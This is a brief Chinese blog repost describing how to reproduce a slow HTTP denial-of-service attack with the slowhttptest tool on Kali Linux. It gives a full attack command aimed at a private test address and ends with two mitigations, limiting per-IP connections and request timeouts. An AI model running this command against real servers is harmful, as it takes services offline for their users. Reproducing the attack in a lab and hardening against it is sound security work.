码迷,mamicode.com
首页 > Web开发 > 详细

慢速HTTP拒接服务攻击(DoS)复现

时间:2017-07-17 10:12:15      阅读:268      评论:0      收藏:0      [点我收藏+]

标签:com   超时   连接数   ima   targe   bsp   blog   slow   html   

kali linux下有个神奇的工具叫“slowhttptest

  命令:slowhttptest -c 1000 -H -g -o slowhttp -i 10 -r 200 -t GET -u http://10.210.6.69:8081/nmc -x 24 -p                                          

  技术分享

  在进行慢速DOS攻击期间打开相应页面服务器会响应缓慢或直接无法响应:

  技术分享

 

 

修补的方案:

1、限制单机ip的连接数。

2、限制http request header/body 的超时时间

 

慢速HTTP拒接服务攻击(DoS)复现

标签:com   超时   连接数   ima   targe   bsp   blog   slow   html   

原文地址:http://www.cnblogs.com/xishaonian/p/7192581.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!